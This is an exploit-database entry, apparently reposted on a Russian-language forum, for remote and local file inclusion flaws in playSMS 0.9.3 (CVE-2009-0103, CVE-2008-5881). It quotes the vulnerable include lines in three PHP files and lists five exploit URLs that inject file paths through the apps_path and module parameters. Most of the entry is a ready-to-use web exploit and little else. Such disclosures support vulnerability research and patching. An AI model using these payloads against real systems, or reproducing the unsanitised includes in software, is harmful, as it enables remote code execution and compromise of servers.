- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7687
- Проверка EDB
-
- Пройдено
- Автор
- AHMADBADY
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-0103 cve-2008-5881
- Дата публикации
- 2009-01-06
Код:
==:RFI/LFI:==
=====================
script:playsms 0.9.3
==========================================================================
download from:http://downloads.sourceforge.net/playsms/playsms-0.9.3.tar.gz?modtime=1211284086&big_mirror=0
==========================================================================
vul1: /plugin/gateway/gnokii/init.php lin 2 , 3;
2 include "$apps_path[plug]/gateway/$gateway_module/config.php";
3 include "$apps_path[plug]/gateway/$gateway_module/fn.php";
==========================================================================
vul2: /plugin/themes/default/init.php lin 2 , 3;
2 include $apps_path[themes]."/".$themes_module."/config.php";
3 include $apps_path[themes]."/".$themes_module."/fn.php";
==========================================================================
vul3: /lib/function.php lin 4 and...
lin4 include "$apps_path[libs]/fn_auth.php";
==========================================================================
xpl:
http://127.0.0.1/path/plugin/gateway/gnokii/init.php?apps_path[plug]=[Rfi]?
http://127.0.0.1/path/plugin/gateway/gnokii/init.php?gateway_module=[Lfi]
http://127.0.0.1/path/plugin/themes/default/init.php?apps_path[themes]=[Rfi]?
http://127.0.0.1/path/plugin/themes/default/init.php?themes_module=[Lfi]
http://127.0.0.1/path/lib/function.php?apps_path[libs]=[Rfi]?
==========================================================================
***************************************************
---------------------------------------------------
Author: ahmadbady [[email protected]]
---------------------------------------------------
# milw0rm.com [2009-01-06]
- Источник
- www.exploit-db.com